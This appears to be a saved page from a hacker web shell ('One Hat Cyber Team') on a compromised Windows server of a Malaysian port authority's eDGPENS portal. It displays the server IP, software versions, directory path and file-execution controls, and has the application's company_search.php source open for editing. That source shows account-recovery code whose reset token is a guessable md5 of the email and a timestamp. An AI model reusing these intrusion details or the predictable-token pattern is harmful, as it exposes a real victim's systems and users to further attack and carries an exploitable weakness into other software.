One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
htdocs
/
edgpens
/
Edit File:
company_search.php
<?php if(empty($page)){ include("access2.php"); } ?> <script type="text/javascript"> $(document).ready(function(){ $.testme = function(x,y){ var typ = ''; if(x == '1') typ = "success"; else if(x == '2') typ = "warning"; else typ = "danger"; $.bootstrapGrowl('<h4><strong>Notification</strong></h4> <p>'+y+'</p>', { type: typ, delay: 3000, allow_dismiss: true, offset: {from: 'top', amount: 20} }); }; }); </script> <?php growl_me($_SESSION,$g_success); require 'extension/PHPMailer-master/src/Exception.php'; require 'extension/PHPMailer-master/src/PHPMailer.php'; require 'extension/PHPMailer-master/src/SMTP.php'; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\SMTP; $success = 0; if($_POST): $email = $_POST['user-email']; $mail = new PHPMailer(true); $sql = "SELECT a.* FROM user_list a WHERE 1 AND emailUser = ?"; $param_data = array( "emailUser" => $email ); $data = mysqli_prepare_all($sql,$param_type = "auto",$param_data); if(empty($data->fetch_assoc())) goto skipsend; try { ob_start(); $token = md5($email.date("dmyh:i:s")); $stmt = $mysqli->stmt_init(); $stmt->prepare("UPDATE user_list SET recovery_token = ?, recovery_exp = ADDTIME(NOW(), '00:30:00') WHERE emailUser = ?"); $stmt->bind_param("ss",$token,$email); $stmt->execute(); $stmt->close(); $sql = "SELECT `a`.`text`,b.* FROM kod_template a JOIN utiliti_email b WHERE 1 AND a.kod = 'E01'"; $param_data = array(); $datax = mysqli_prepare_all($sql,$param_type = "auto",$param_data); $template_text = $datax->fetch_assoc(); $http = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on'? "https://" : "http://"; $url = $http . $_SERVER["SERVER_NAME"] .'/edgpens/'; $find = array( "%url%", "%token%", "%year%", "%templatename%"); $replace = array( $url, $token, date("Y"), $template['name'].' '.$template['version']); echo str_replace($find,$replace,$template_text['text']); // include('recover_msg.php'); $fileValue = ob_get_contents(); ob_end_clean(); //Server settings // $mail->SMTPDebug = SMTP::DEBUG_SERVER; // Enable verbose debug output $mail->isSMTP(); // Send using SMTP $mail->Host = $template_text['host']; // Set the SMTP server to send through $mail->SMTPAuth = $template_text['smtpauth']; // Enable SMTP authentication $mail->Username = $template_text['username']; // SMTP username $mail->Password = $template_text['password']; // SMTP password $mail->SMTPSecure = $template_text['smtpsecure']; // Enable TLS encryption; `PHPMailer::ENCRYPTION_SMTPS` encouraged $mail->Port = $template_text['port']; // TCP port to connect to, use 465 for `PHPMailer::ENCRYPTION_SMTPS` above //Recipients $mail->setFrom($template_text['setfrom1'],$template_text['setfrom2']); // $mail->addAddress('joe@example.net', 'Joe User'); // Add a recipient $mail->addAddress($email); // Name is optional // $mail->addReplyTo('info@example.com', 'Information'); // $mail->addCC('cc@example.com'); // $mail->addBCC('bcc@example.com'); // Attachments // $mail->addAttachment('/var/tmp/file.tar.gz'); // Add attachments // $mail->addAttachment('/tmp/image.jpg', 'new.jpg'); // Optional name // Content $mail->isHTML(true); // Set email format to HTML $mail->Subject = 'Account Recovery'; $mail->Body = $fileValue; $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; $mail->send(); echo 'Message has been sent'; } catch (Exception $e) { // echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; } // include "recover_msg.php"; // exit(); skipsend: $_SESSION['success'] = 1; $_SESSION['success_msg'] = "Account recovery email has been sent."; echo "<script>window.location.replace('index.php?page=account_recovery&success=1');</script>"; exit(); endif; // if() ?> <div id="page-content"> <div class="row"> <div class="col-sm-12"> <div class="widget-image widget-image-xs"> <img src="img/lpkmn/bg.jpg" alt="image"> <div class="widget-image-content"> <div class="pull-right text-light-op"> <strong> <form id="form-login" method="post" action="login.php" class="form-inline" style="vertical-align: top"> <div class="row" style="vertical-align: top;margin-bottom: 0px;text-align: right"> <div class="col-md-12"> <i><a style="cursor: pointer;color: #CCC;" href="index.php?page=company_search">Agent Registration</a></i> || <i><a style="cursor: pointer;color: #CCC;" href="index.php?page=account_recovery">Forgot Password</a></i> </div> </div> <hr style="margin: 3px"> <div class="form-group" style="vertical-align: top;margin-bottom: 1px"> <div class="col-md-12 nopadding"> <input type="text" id="login-user" name="login-user" class="form-control" placeholder="Your email.."> </div> </div> <div class="form-group" style="vertical-align: top;margin-bottom: 1px"> <div class="col-md-12 nopadding"> <input type="password" id="login-password" name="login-password" class="form-control" placeholder="Your password.."> </div> </div> <div class="form-group form-actions" style="text-align:right;vertical-align: top;margin-bottom: 1px"> <div class="col-md-12 nopadding"> <button type="submit" class="btn btn-effect-ripple btn-sm btn-primary" style="margin-top: 3px"><i class="fa fa-unlock-alt"></i> Login</button> </div> </div> </form> </strong> </div> <h2 class="widget-heading text-light"><strong>eDGPENS LPKMn</strong></h2> <h3 class="widget-heading text-light-op">Lembaga Pelabuhan Kemaman</h3> </div> </div> </div> </div> <!-- Login Container --> <div id="container-fluid" style="position: relative;top:20px"> <!-- Login Block --> <div class="row"> <div class="col-md-4 col-md-offset-4"> <div class="block animation-fadeInQuickInv"> <!-- Login Title --> <div class="block-title"> <h2>Company</h2> </div> <!-- END Login Title --> <!-- Login Form --> <form id="form-loginx" action="index.php?page=registration" method="get" class="form-bordered"> <input type="hidden" name="page" value="registration"> <div class="form-group"> <label for="company">Reg No / Company Name</label> <?php $sqlx = "SELECT * FROM kod_syarikat WHERE flagAktif = 'Y' AND flagApprove = 'Y' ORDER BY nama"; $rstx = $mysqli->query($sqlx) or die(mysqli_error($mysqli)); ?> <select class="form-control select-select2 validation" data-validation="default" name="company" id="company"> <option value="">-- Please select --</option> <?php while($aa = $rstx->fetch_assoc()){ ?> <option value="<?php echo md5('id'.$aa['idSyarikat']); ?>" ><?php if(!empty($aa['company_no'])){echo strtoupper($aa['company_no'])." - ";} ?><?php echo strtoupper($aa['nama']); ?></option> <?php }?> </select> <span class="help-block">Click <a href="index.php?page=registration&company=new">Here</a> To Register With New Company.</span> </div> <div class="form-group form-actions"> <button type="submit" class="btn btn-effect-ripple btn-sm btn-primary btn-block">Submit</button> </div> </form> <!-- END Login Form --> </div> <!-- END Login Block --> <!-- Footer --> <footer class="text-muted text-center animation-pullUp"> <small><span id="year-copy"></span> © <a href="login.php" target="_self"><?php echo $template['name'] . ' ' . $template['version']; ?></a></small> </footer> <!-- END Footer --> </div></div> </div> </div> <!-- END Login Container --> <?php // include 'inc/template_scripts.php'; ?> <!-- Load and execute javascript code used only in this page --> <script src="custom.js"></script> <script src="js/pages/formsValidation.js"></script> <script type="text/javascript"> $(document).ready(function(){ $("#form-loginx").setvalidation(""); }); </script> <script src="js/pages/readyLogin.js"></script> <script>$(function(){ ReadyLogin.init(); });</script>
Simpan